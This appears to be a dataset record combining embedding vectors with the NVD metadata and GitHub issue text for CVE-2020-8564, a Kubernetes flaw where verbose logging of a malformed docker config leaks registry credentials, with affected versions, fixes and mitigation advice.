0.012462718412280083, 0.005334948655217886, 0.0024673049338161945, 0.028894010931253433, 0.01131391990929842, -0.014734204858541489, 0.013576704077422619, 0.005104318726807833, -0.03004280850291252, 0.004090417176485062, -0.0018026120960712433, 0.00546984514221549, -0.009564613923430443, -0.006971115246415138, -0.004760549403727055, -0.01696217618882656, 0.0020898114889860153, 0.014760314486920834, 0.022906336933374405, -0.008972808718681335, -0.014011855237185955, -0.01272380817681551, -0.02353295311331749, -0.0008637742721475661, -0.011157265864312649, 0.006775297690182924, 0.011357435025274754, -0.0147167993709445, -0.011879616416990757, -0.022906336933374405, 0.0019407724030315876, 0.0019375088158994913, -0.007340993732213974, -0.004886743146926165, -0.011200780980288982, -0.029712093994021416, 0.003650914877653122, 0.011583713814616203, 0.01587430015206337, -0.0019451240077614784, -0.0059398082084953785, -0.002423789817839861, 0.010678599588572979, -0.011931833811104298, 0.00616173492744565, -0.0011564132291823626, -0.004851931240409613, -0.0007702168659307063, 0.006087759509682655, 0.0033920002169907093, 0.026544196531176567, 0.001102563226595521, -0.010191231034696102, -0.006383661646395922, 0.010252152569591999, -0.014638472348451614, 0.016361668705940247, 0.0014359975466504693, -0.009590722620487213, 0.013977042399346828, 0.010008467361330986, -0.007654302287846804, 0.012236439622938633, -0.0030068918131291866, 0.0059572141617536545, 0.0008991303038783371, 0.015430446714162827, 0.02837182953953743, -0.03401138260960579, -0.003485557623207569, 0.011018017306923866, -0.0008246107026934624, 0.0005825581029057503, -0.017641011625528336, 0.008093804121017456, -0.009494990110397339, 0.014455708675086498, -0.01935550570487976, -0.015761161223053932, -0.023463329300284386, -0.0029960130341351032, 0.009512395597994328, -0.01167074404656887, -0.002908982802182436, -0.00003267030479037203, 0.00769781693816185, -0.011018017306923866, 0.013663734309375286, -0.008502845652401447, 0.027832243591547012, 0.014699392952024937, -0.0009110969258472323, 0.024908030405640602, 0.003561709076166153, 0.022157877683639526, 0.014194617979228497, -0.02393329329788685, 0.00647504348307848, -0.016213716939091682, 0.005012936890125275, 0.0067535401321947575, -0.013524485751986504, -0.017319001257419586, -0.015430446714162827, -0.03954650089144707, -0.0003900038718711585, -0.010948393493890762, 0.025517242029309273, 0.02525615133345127, 0.013933527283370495, -0.011105047538876534, -0.006000729277729988, -0.017527872696518898, 0.009260008111596107, 0.0774916484951973, -0.0250994972884655, -0.00914686918258667, -0.01370724942535162, 0.009564613923430443, 0.02177494391798973, 0.0021768417209386826, 0.05931975319981575, 0.009817001409828663, 0.018728889524936676, 0.010974502190947533, 0.0009567877859808505, 0.015891706570982933, -0.005047748796641827, -0.03145269677042961, -0.01562191266566515, 0.01373335812240839, -0.009608129039406776, -0.011679446324706078, 0.009642940945923328, 0.0011433586478233337, 0.009590722620487213, 0.01305452361702919, -0.00881180353462696, 0.002608728827908635, -0.0057352869771420956, -0.0019505632808431983, -0.007958907634019852, -0.01794561743736267, 0.02459472231566906, -0.011609822511672974, 0.005683069117367268, 0.0011781706707552075, 0.003983805421739817, 0.0030743402894586325, 0.009477583691477776, -0.035212401300668716, 0.018206708133220673, 0.012358281761407852, -0.006692619062960148, 0.008376652374863625, 0.02041727490723133, 0.00861598551273346, -0.003607399994507432, 0.01683163270354271, -0.0022453779820352793, -0.01459495723247528, 0.007880580611526966, 0.01305452361702919, -0.014943077228963375, 0.0024673049338161945, 0.0008567030890844762, 0.020782800391316414, -0.012532342225313187, -0.0017395152244716883, 0.013315613381564617, -0.0024934138637036085, 0.01075692754238844, 0.0185026116669178, -0.007340993732213974, -0.012880463153123856, 0.009703862480819225, -0.023915886878967285, -0.008981511928141117, -0.012366984970867634, -0.019842876121401787, -0.006696970202028751, -0.005117373075336218, -0.005817965604364872, -0.008311379700899124, 0.012628075666725636, -0.02374182641506195, 0.01361151598393917, 0.00006143104837974533, 0.007319236174225807, 0.00246948073618114, -0.0034246365539729595, 0.007214799989014864, 0.007153878919780254, 0.00039190766983665526, -0.0021594357676804066, 0.0066752126440405846, -0.01053064875304699, 0.015961330384016037, -0.012628075666725636, 0.0006880821310915053, -0.009216492995619774, -0.010565460659563541, -0.016927365213632584, -0.006174789275974035, -0.004799712914973497, -0.001373988576233387, -0.013150256127119064, -0.012610669247806072, 0.002802371047437191, -0.000040013474063016474, 0.02233193814754486, 0.00005619564399239607, 0.014856046997010708, -0.021304981783032417, 0.00811121053993702, -0.001121601089835167, 0.00654031615704298, -0.00477360375225544, 0.0011629404034465551, 0.02959025278687477, 0.005987674463540316, -0.0019081361824646592, 0.004170920234173536, -0.01461236272007227, -0.006831867154687643, -0.0061182198114693165, -0.0031091521959751844, -0.007606435567140579, -0.013124147430062294, -0.008877076208591461, 0.014351272024214268, -0.005922401789575815, 0.025778330862522125, -0.008302676491439342, -0.005996377673000097, 0.005208754912018776, -0.005482899956405163, -0.003422460751608014, -0.009355741553008556, 0.02151385508477688, 0.0014588430058211088, 0.003444218309596181, 0.020643552765250206, 0.01975584588944912, 0.003326727543026209, -0.0006782912532798946, -0.004392846953123808, 0.004079538397490978, 0.028841793537139893, -0.0010546967387199402, -0.001769975759088993, -0.0023454625625163317, -0.010095497593283653, -0.006535964552313089, 0.01965140923857689, -0.005822317209094763, 0.03307145833969116, 0.02142682485282421, 0.005374112166464329, 0.009582020342350006, 0.010852660052478313, -0.027832243591547012, 0.02036505565047264, 0.00019173830514773726, -0.014307757839560509, 0.0017971727065742016, 0.008546360768377781, -0.005482899956405163, -0.0014055370120331645, 0.0026914074551314116, -0.012836948037147522, -0.004847579635679722, 0.011548901908099651, 0.018937760964035988, -0.007275721058249474, -0.008224349468946457, 0.004973773378878832, -0.0023889776784926653, 0.024368442595005035, -0.024525096639990807, 0.005348003003746271, -0.0037705814465880394, -0.0006287928554229438, -0.020243214443325996, 0.0070929573848843575, 0.011113750748336315, -0.017075316980481148, 0.007493296172469854, 0.010991908609867096, 0.01624852977693081, -0.011827398091554642, -0.011400950141251087, -0.00008601026638643816, -0.00440590176731348, -0.01234957855194807, 0.012149409390985966, -0.0022073022555559874, 0.041356731206178665, 0.0052522700279951096, 0.016553135588765144, 0.013324316591024399, 0.01167074404656887, -0.010217339731752872, -0.017049206420779228, 0.01672719605267048, 0.012732511386275291, 0.009164275601506233, -0.01794561743736267, -0.010896175168454647, 0.017171049490571022, 0.011044126935303211, -0.0050172884948551655, -0.02196641080081463, 0.018363362178206444, 0.00832443404942751, -0.010400103405117989, -0.004432010464370251, 0.007371454034000635, -0.012340876273810863, 0.01925107091665268, -0.025221338495612144, -0.01749306172132492, -0.0075498661026358604, -0.010774333029985428, 0.01701439544558525 ]
1,716
CVE-2020-8564
2020-12-07T22:15:21.307000
In Kubernetes clusters using a logging level of at least 4, processing a malformed docker config file will result in the contents of the docker config file being leaked, which can include pull secrets or other registry credentials. This affects < v1.19.3, < v1.18.10, < v1.17.13.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 3.6, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/95622" }, { "source": "[email protected]", "tags": [ "Mailing List", "Patch", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20210122-0006/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "B765012B-C658-4EB8-956A-62A91142CE05", "versionEndExcluding": "1.17.13", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "67F84BBA-5FCA-4A23-BB4E-47BE92E3706A", "versionEndExcluding": "1.18.10", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.18.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "456BD01B-44E8-4823-B220-5E109D8C377D", "versionEndExcluding": "1.19.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.19.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/95622
[ "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: 4.7 CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N (Medium) In Kubernetes clusters using a logging level of at least 4, processing a malformed docker config file will result in the contents of the docker config file being leaked, which can include pull secrets or other registry credentials. ### Am I vulnerable? If kubernetes.io/dockerconfigjson type secrets are used, and a log level of 4 or higher is used. Third party tools using k8s.io/kubernetes/pkg/credentialprovider to read docker config files may also be vulnerable. #### Affected Versions kubernetes v1.19.0 - v1.19.2 kubernetes v1.18.0 - v1.18.9 kubernetes v1.17.0 - v1.17.12 ### How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to logs. #### Fixed Versions v1.19.3 v1.18.10 v1.17.13 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster #### Acknowledgements This vulnerability was reported by: Nikolaos Moraitis (Red Hat) /area security /kind bug /committee product-security
CVE-2020-8564: Docker config secrets leaked when file is malformed and log level >= 4
https://api.github.com/repos/kubernetes/kubernetes/issues/95622/comments
3
2020-10-15T22:03:19
2021-12-02T22:54:10Z
https://github.com/kubernetes/kubernetes/issues/95622
722,705,294
95,622
true
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : CVE-2020-8564: Docker config secrets leaked when file is malformed and log level >= 4 Issue date: --- start body --- CVSS Rating: 4.7 CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N (Medium) In Kubernetes clusters using a logging level of at least 4, processing a malformed docker config file will result in the contents of the docker config file being leaked, which can include pull secrets or other registry credentials. ### Am I vulnerable? If kubernetes.io/dockerconfigjson type secrets are used, and a log level of 4 or higher is used. Third party tools using k8s.io/kubernetes/pkg/credentialprovider to read docker config files may also be vulnerable. #### Affected Versions kubernetes v1.19.0 - v1.19.2 kubernetes v1.18.0 - v1.18.9 kubernetes v1.17.0 - v1.17.12 ### How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to logs. #### Fixed Versions v1.19.3 v1.18.10 v1.17.13 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster #### Acknowledgements This vulnerability was reported by: Nikolaos Moraitis (Red Hat) /area security /kind bug /committee product-security --- end body ---
1,311
[ -0.003433013567700982, -0.0238876361399889, -0.008267257362604141, 0.0022553130984306335, 0.038593877106904984, -0.03950134292244911, -0.005618264898657799, 0.021312041208148003, -0.009454966522753239, 0.007313086185604334, -0.022473059594631195, -0.02302020788192749, -0.015013178810477257, 0.01725514605641365, -0.00808042660355568, 0.05287307873368263, -0.030266568064689636, -0.014599482528865337, 0.016921520233154297, -0.00868762657046318, 0.009488329291343689, 0.014973144046962261, -0.012077268213033676, 0.05140512436628342, 0.02282003127038479, 0.02204601839184761, 0.023340487852692604, 0.01907007396221161, -0.04016859456896782, 0.043584927916526794, 0.0439852774143219, 0.03421670198440552, -0.005611592438071966, -0.025408970192074776, 0.0537271611392498, 0.009895352646708488, 0.014692897908389568, 0.05338019132614136, -0.013204924762248993, -0.014172440394759178, -0.03352275863289833, -0.05287307873368263, 0.0008857775246724486, 0.02096506953239441, -0.01834944076836109, 0.0017648825887590647, 0.023634079843759537, -0.00523793138563633, -0.02869185246527195, 0.011863747611641884, -0.030079737305641174, -0.04889625683426857, -0.05775736644864082, -0.060906797647476196, 0.005091135855764151, -0.018683066591620445, -0.01526673510670662, 0.006812646985054016, 0.004120283294469118, 0.021819153800606728, 0.00954838190227747, -0.0033829696476459503, 0.015133284032344818, 0.024114500731229782, -0.008280602283775806, -0.016774725168943405, 0.0016297639813274145, -0.01483969297260046, -0.032962266355752945, 0.022366300225257874, 0.006832664366811514, 0.0019867438822984695, 0.0479087233543396, 0.006866027135401964, 0.05089801177382469, 0.0013561905361711979, 0.0710490345954895, 0.04144971817731857, -0.03563127666711807, 0.007406501565128565, -0.029225654900074005, 0.014052335172891617, 0.005011065397411585, 0.008027045987546444, 0.052179135382175446, 0.004076912067830563, -0.05079125240445137, -0.07083551585674286, 0.02017771266400814, -0.017642153427004814, -0.00039263631333597004, 0.0016197551740333438, -0.0014129069168120623, -0.021418802440166473, 0.03862056881189346, -0.006172084715217352, -0.03651205077767372, -0.012971386313438416, -0.0573837049305439, -0.023687459528446198, -0.03717930242419243, 0.008867784403264523, -0.013565241359174252, 0.0006176254828460515, 0.04491943120956421, -0.003646534401923418, 0.000545061775483191, 0.008767696097493172, -0.019523805007338524, 0.11978515237569809, 0.02962600626051426, -0.012284116819500923, -0.048229001462459564, -0.036939091980457306, -0.03891415894031525, 0.03322916850447655, -0.010789470747113228, 0.0036765607073903084, -0.06400284916162491, -0.0038667276967316866, -0.0346437431871891, -0.04988379031419754, -0.01836278662085533, -0.024181226268410683, -0.02757086791098118, 0.059999335557222366, -0.008921164087951183, 0.01347182597965002, -0.03995507210493088, -0.018402820453047752, -0.002779106143862009, 0.015133284032344818, -0.03338931128382683, 0.0028007919900119305, -0.03154769167304039, 0.039768241345882416, -0.0025755942333489656, 0.031067270785570145, -0.0059385462664067745, -0.010202288627624512, -0.02291344664990902, -0.028398262336850166, -0.01911010779440403, 0.026263054460287094, -0.007933630608022213, 0.015106594190001488, 0.0019884121138602495, 0.006589117459952831, -0.024461472406983376, -0.006348906550556421, -0.01637437380850315, 0.002824145834892988, 0.025662526488304138, 0.01913679763674736, 0.07585325092077255, -0.016801415011286736, 0.0007323094760067761, 0.02670344151556492, 0.005738370586186647, -0.04430555924773216, 0.010876214131712914, -0.03461705520749092, -0.012837936170399189, -0.04003514349460602, 0.04040880501270294, 0.02005760744214058, 0.000557989813387394, 0.007406501565128565, -0.00814047921448946, 0.021805807948112488, 0.01633433811366558, -0.015707122161984444, 0.04027535393834114, -0.0025055326987057924, -0.049323298037052155, 0.0016389386728405952, -0.0049843755550682545, 0.048415832221508026, 0.009948733262717724, -0.011249875649809837, 0.007846888154745102, 0.014079025015234947, -0.03931451216340065, 0.0013853827258571982, 0.036859020590782166, -0.005014401860535145, -0.012137320823967457, 0.00956839881837368, 0.0004470591084100306, -0.026956995949149132, -0.007086220197379589, -0.005227922461926937, -0.002405444858595729, -0.03245515748858452, -0.04203690215945244, 0.030453398823738098, -0.013758744113147259, -0.011616864241659641, 0.011276565492153168, -0.02879861369729042, 0.008974544703960419, 0.024608267471194267, -0.03250853717327118, 0.00571168027818203, -0.031093960627913475, 0.027464108541607857, -0.006455666851252317, 0.019764015451073647, 0.017748912796378136, -0.0326152965426445, -0.03555120900273323, 0.0124509297311306, 0.026116259396076202, 0.020738204941153526, 0.03912768140435219, 0.01612081751227379, -0.0010008786339312792, 0.02861178293824196, -0.04523971304297447, -0.009588416665792465, 0.027384037151932716, -0.04582689329981804, 0.007159618195146322, -0.0022786669433116913, -0.014652862213551998, 0.0005517342942766845, 0.007546624634414911, -0.010395792312920094, -0.029118893668055534, -0.022753305733203888, 0.022206159308552742, -0.02879861369729042, 0.008127134293317795, -0.007433191407471895, -0.0012118971208110452, -0.04897632449865341, -0.014412651769816875, 0.0024004403967410326, 0.0014988157199695706, 0.022553130984306335, 0.01830940507352352, 0.003946797922253609, -0.012684468179941177, -0.021432146430015564, -0.01899000257253647, 0.03136086091399193, -0.01142336055636406, 0.017001591622829437, 0.007806852925568819, 0.020377887412905693, -0.02951924502849579, 0.04112943634390831, -0.029118893668055534, -0.0038100110832601786, -0.0027574205305427313, -0.036912404000759125, 0.0014838024508208036, 0.008761024102568626, 0.009828628040850163, -0.0019033374264836311, 0.03181459382176399, 0.014492722228169441, 0.005224585998803377, 0.0101155461743474, 0.007506589405238628, -0.01005549356341362, -0.021685702726244926, 0.01612081751227379, -0.006469011772423983, -0.00667252391576767, 0.024554887786507607, -0.006145394407212734, -0.03942127153277397, -0.00017473672050982714, -0.007793508004397154, -0.005484814755618572, 0.023540664464235306, 0.006158739328384399, -0.012637760490179062, -0.004570678807795048, 0.007573314476758242, -0.006695877760648727, -0.0042070262134075165, 0.003736613318324089, 0.017668843269348145, 0.019563840702176094, 0.0031410905066877604, -0.057917509227991104, -0.014946453273296356, -0.01287129893898964, -0.013331702910363674, -0.017935743555426598, -0.0192168690264225, 0.014719587750732899, -0.012537672184407711, 0.010909576900303364, -0.003032662207260728, 0.03432346135377884, -0.018336094915866852, 0.005114489700645208, -0.012591052800416946, 0.000665167230181396, -0.004166990984231234, 0.033069029450416565, 0.011189822107553482, 0.032108183950185776, -0.006859354674816132, 0.054074134677648544, -0.011723624542355537, 0.0018849880434572697, -0.013031438924372196, -0.05052435025572777, -0.013158217072486877, -0.03256191685795784, -0.0019100100034847856, 0.010309049859642982, 0.0009833632502704859, -0.01529342494904995, -0.006245482247322798, 0.004146973602473736, 0.04003514349460602, 0.0014279200695455074, -0.0257159061729908, -0.00020851637236773968, 0.022673236206173897, -0.07462550699710846, -0.007606677245348692, 0.010996319353580475, -0.03154769167304039, 0.006575772073119879, -0.015079904347658157, 0.00016066186071839184, -0.032962266355752945, -0.0011068049352616072, -0.023487284779548645, -0.029492555186152458, -0.025462351739406586, -0.0028791939839720726, 0.025542421266436577, -0.018936622887849808, -0.006218792404979467, -0.007926958613097668, -0.020337853580713272, -0.020511338487267494, 0.02113855630159378, -0.023353833705186844, 0.021779118105769157, 0.0105892950668931, 0.022606510668992996, -0.013551896438002586, 0.0007348117069341242, 0.0012844608863815665, 0.004870942328125238, 0.012344169430434704, 0.020311161875724792, -0.027410728856921196, -0.00023312130360864103, 0.0068993899039924145, 0.03555120900273323, -0.029972977936267853, 0.02689027041196823, -0.05153857544064522, -0.011603519320487976, 0.017095007002353668, -0.004180336371064186, -0.01433258131146431, -0.01825602538883686, -0.009528364054858685, -0.0420902818441391, -0.03755296394228935, -0.004257070366293192, -0.008374017663300037, -0.010862869210541248, 0.014599482528865337, -0.0007018661126494408, -0.011823711916804314, -0.04577351361513138, 0.002910888521000743, -0.045559994876384735, 0.034190014004707336, -0.01814926415681839, 0.007686747703701258, 0.003443022258579731, -0.030400019139051437, 0.031120652332901955, 0.048309072852134705, 0.011670243926346302, 0.02962600626051426, 0.004317122977226973, 0.01050255261361599, -0.02757086791098118, 0.08460760116577148, -0.029145583510398865, -0.04889625683426857, -0.03152100369334221, 0.03910098969936371, -0.008981216698884964, 0.007426518946886063, 0.051832165569067, 0.008874456398189068, 0.004804217256605625, 0.023407213389873505, 0.022473059594631195, -0.0323483943939209, -0.0034763850271701813, -0.005568221211433411, 0.008881129324436188, -0.028131360188126564, -0.02568921633064747, -0.011616864241659641, -0.011576828546822071, 0.003221160965040326, -0.005374717991799116, -0.024461472406983376, 0.015039868652820587, 0.06197440251708031, 0.0399283841252327, -0.01821598969399929, 0.0029859545174986124, 0.0537271611392498, 0.023420559242367744, 0.028291501104831696, 0.02306024171411991, 0.019643910229206085, 0.037926625460386276, 0.018816517665982246, 0.034910645335912704, 0.022606510668992996, 0.04662759602069855, -0.03480388596653938, -0.004247061442583799, -0.006058651488274336, 0.006138721946626902, -0.009441621601581573, -0.007893595844507217, 0.01002213079482317, -0.028985444456338882, -0.06720566004514694, 0.016868140548467636, 0.007753472775220871, -0.032188255339860916, 0.030319947749376297, -0.017762258648872375, 0.00673591298982501, -0.052125755697488785, -0.02197929285466671, -0.03253522515296936, 0.00046749369357712567, -0.043531544506549835, -0.02600949816405773, -0.02669009566307068, 0.013972264714539051, -0.03176121413707733, -0.021338731050491333, -0.003656543092802167, -0.027317313477396965, 0.004197017755359411, -0.02775769867002964, 0.0460137240588665, 0.009014579467475414, 0.00013855913130100816, 0.02187253348529339, -0.016494479030370712, 0.015974022448062897, -0.014893073588609695, -0.0048876237124204636, -0.021285351365804672, -0.033069029450416565, 0.008954526856541634, -0.04427886754274368, 0.03154769167304039, 0.03798000514507294, 0.002033451572060585, -0.016134163364768028, -0.021472182124853134, 0.027944529429078102, 0.019617220386862755, -0.012230736203491688, -0.02480844408273697, 0.022272884845733643, 0.024154536426067352, 0.020885000005364418, -0.006092014256864786, 0.04219704121351242, 0.008387362584471703, -0.03707254305481911, 0.0002635646960698068, -0.02308693341910839, 0.011983852833509445, -0.0030660247430205345, 0.040195282548666, -0.02970607578754425, -0.023153657093644142, -0.025075344368815422, 0.018896587193012238, 0.005124498158693314, -0.010369102470576763, -0.011389998719096184, 0.09224096685647964, -0.004941003862768412, 0.039741553366184235, -0.014159095473587513, 0.00010384115012129769, -0.01996419206261635, -0.024621613323688507, -0.03330923989415169, -0.02767762914299965, 0.030426708981394768, -0.009902025572955608, 0.02296682633459568, -0.0024421438574790955, -0.026196328923106194, 0.010282359085977077, -0.026636715978384018, -0.0024154535494744778, -0.02504865452647209, 0.028104670345783234, -0.0007560803787782788, 0.001143503817729652, 0.00457735126838088, -0.008834421634674072, -0.012644432485103607, 0.022326264530420303, 0.022566474974155426, -0.0021502207964658737, 0.03515085577964783, 0.008213876746594906, -0.0009258126956410706, -0.004387184511870146, -0.016054091975092888, 0.029412485659122467, 0.010802816599607468, -0.0182693712413311, -0.010422482155263424, 0.017775604501366615, 0.03429677337408066, -0.0010676038218662143, -0.014799658209085464, -0.03378966078162193, 0.01190378237515688, -0.015707122161984444, 0.01012221910059452, -0.038780707865953445, -0.010696055367588997, -0.025502385571599007, -0.001993416575714946, -0.007239688653498888, 0.03840704634785652, 0.03733944520354271, -0.02596946246922016, 0.01736190728843212, -0.01050255261361599, 0.004624058958142996, 0.014452686533331871, -0.012811246328055859, 0.017748912796378136, 0.020818274468183517, 0.023313798010349274, 0.01006216648966074, -0.012130648829042912, -0.0042070262134075165, 0.015093249268829823, -0.0028758577536791563, -0.012290788814425468, 0.011663571931421757, -0.023540664464235306, 0.0020951724145561457, -0.003840037388727069, -0.019590530544519424, -0.003509747562929988, 0.013044783845543861, -0.030159808695316315, -0.003071029204875231, -0.024448128417134285, -0.0011968839680776, 0.04281091317534447, -0.012237409129738808, -0.006532400846481323, -0.010302376933395863, 0.006132049486041069, 0.0008707643719390035, 0.023193692788481712, -0.006999477744102478, -0.004567342810332775, -0.01907007396221161, 0.009308170527219772, 0.003366288263350725, 0.017855674028396606, -0.006815982982516289, 0.0022920118644833565, -0.006652506534010172, 0.019857430830597878, -0.005484814755618572, -0.014719587750732899, 0.023287108168005943, -0.00673591298982501, 0.020311161875724792, 0.009014579467475414, 0.02978614717721939, 0.024621613323688507, 0.008460760116577148, 0.00960843451321125, 0.008467433042824268, -0.035844799131155014, -0.0032261651940643787, 0.025035310536623, -0.001357858651317656, 0.022566474974155426, -0.012097286060452461, 0.012270771898329258, 0.00430711405351758, -0.01830940507352352, 0.028104670345783234, -0.021498871967196465, 0.006992804817855358, 0.025102034211158752, 0.024608267471194267, -0.0002598114078864455, 0.003843373851850629, -0.0171884223818779, -0.00505443662405014, 0.0013762080343440175, 0.02770431898534298, -0.0024538205470889807, 0.028104670345783234, 0.013425118289887905, 0.009181393310427666, -0.007433191407471895, 0.010822833515703678, -0.0009541709441691637, -0.002687358995899558, -0.0005292145651765168, 0.011410015635192394, -0.041743308305740356, -0.03733944520354271, 0.021725738421082497, 0.01107638981193304, -0.024234605953097343, -0.02789114974439144, -0.02767762914299965, -0.020791584625840187, -0.0054614609107375145, -0.025115380063652992, 0.025222139433026314, -0.03771310672163963, 0.0013728718040511012, -0.019390353932976723, 0.019830740988254547, 0.0022786669433116913, -0.012998076155781746, 0.012277443893253803, -0.0015263397945091128, -0.011803695000708103, 0.02770431898534298, 0.012157338671386242, 0.015226699411869049, 0.03741951286792755, 0.06512383371591568, -0.019403699785470963, -0.02307358756661415, -0.014079025015234947, -0.0040268683806061745, -0.01295804139226675, -0.002380422782152891, -0.002368746092543006, -0.0032895542681217194, -0.007579986937344074, -0.003683233167976141, 0.004880951251834631, 0.040755774825811386, 0.004493944812566042, 0.005548203829675913, -0.01920352317392826, -0.00035948221920989454, -0.0014821343356743455, -0.004587360192090273, -0.01822933554649353, 0.030293257907032967, -0.004233716521412134, 0.0035998267121613026, -0.01106971688568592, -0.014185786247253418, -0.01644109934568405, 0.024755064398050308, -0.03563127666711807, 0.0006968617090024054, -0.001105136820115149, 0.001823267200961709, -0.004180336371064186, -0.014759622514247894, 0.0054247621446847916, -0.024501508101820946, 0.0238876361399889, -0.0019733989611268044, 0.012797900475561619, -0.049430057406425476, 0.008861111477017403, -0.014239165931940079, -0.005318001378327608, 0.008807731792330742, -0.022312920540571213, 0.04507957026362419, -0.010709401220083237, 0.06603129953145981, -0.016521168872714043, 0.006919407285749912, 0.005548203829675913, 0.010142236016690731, 0.03056016005575657, 0.009434948675334454, -0.0347771942615509, -0.0015763837145641446, -0.02196594886481762, 0.03136086091399193, -0.022606510668992996, -0.007473226636648178, 0.017548738047480583, 0.025502385571599007, -0.001276954310014844, 0.02100510522723198, -0.0004720810684375465, 0.0015705452533438802, -0.04144971817731857, -0.009942060336470604, 0.002647323766723275, 0.019804051145911217, 0.013184906914830208, 0.0049810390919446945, -0.00043162889778614044, 0.014052335172891617, -0.0006968617090024054, -0.006632488686591387, 0.00808042660355568, 0.008967871777713299, -0.017014935612678528, 0.020337853580713272, 0.02109852060675621, -0.007886922918260098, 0.034109942615032196, 0.023674115538597107, 0.0057550519704818726, -0.010636002756655216, 0.0381668359041214, -0.029465865343809128, 0.016134163364768028, -0.02007095143198967, -0.00601528026163578, 0.018963312730193138, 0.023180348798632622, 0.0018799835816025734, 0.037899937480688095, -0.0019500451162457466, -0.02001757174730301, -0.007433191407471895, -0.02486182376742363, 0.0031144004315137863, 0.008053736761212349, -0.015920642763376236, 0.041609857231378555, -0.00475750956684351, 0.024154536426067352, 0.013972264714539051, -0.0019900803454220295, 0.006632488686591387, 0.027277277782559395, -0.0238876361399889, -0.0028424952179193497, -0.0002735734742600471, -0.0022653217893093824, -0.004543988965451717, 0.006112032104283571, 0.0014129069168120623, -0.0024237942416220903, -0.017508702352643013, -0.02887868322432041, -0.011189822107553482, 0.016547858715057373, -0.02586270309984684, -0.0007815193384885788, 0.037953317165374756, -0.02791783958673477, -0.004717474337667227, -0.01822933554649353, 0.013271650299429893, -0.0064189680851995945, 0.004737492185086012, 0.008994562551379204, -0.01241089403629303, -0.00020590992062352598, 0.03733944520354271, -0.03352275863289833, 0.004941003862768412, 0.024301331490278244, -0.028131360188126564, 0.03250853717327118, -0.030293257907032967, -0.021445492282509804, 0.011129769496619701, -0.008734333328902721, 0.003526428947225213, 0.005688326433300972, 0.003394646570086479, -0.023313798010349274, 0.012817918322980404, -0.006755930371582508, -0.009454966522753239, -0.0171884223818779, -0.017695533111691475, -0.005304656457155943, 0.010269014164805412, -0.023500628769397736, 0.011643554084002972, -0.017001591622829437, 0.014893073588609695, 0.0017582100117579103, -0.02474171854555607, 0.027023721486330032, 0.005801759660243988, 0.0033863058779388666, 0.003281213575974107, 0.030079737305641174, -0.00693942466750741, -0.004006850533187389, 0.011116424575448036, 0.02770431898534298, -0.007653384935110807, -0.026796855032444, 0.009374896064400673, 0.0095083462074399, 0.017949089407920837, 0.01642775349318981, -0.003883408848196268, -0.010148908942937851, -0.00006370175105985254, -0.02967938594520092, 0.019563840702176094, 0.027117136865854263, -0.03739282488822937, -0.004570678807795048, 0.04345147684216499, -0.0022386317141354084, -0.01002213079482317, 0.007646712474524975, 0.0028258138336241245, 0.0012185696978121996, -0.02304689772427082, -0.06512383371591568, 0.013598604127764702, -0.001024232362397015, 0.010329066775739193, 0.006825991906225681, -0.034857265651226044, 0.014105715788900852, 0.007326431106775999, 0.024461472406983376, -0.026556644588708878, 0.005101144313812256, -0.004370503127574921, 0.0201643668115139, 0.006846009287983179, -0.0031077279709279537, -0.0027857788372784853, 0.0016389386728405952, 0.0003417583357077092, 0.01717507652938366, -0.0014479376841336489, -0.010542587377130985, -0.019363664090633392, -0.011243202723562717, -0.0022386317141354084, -0.03520423546433449, 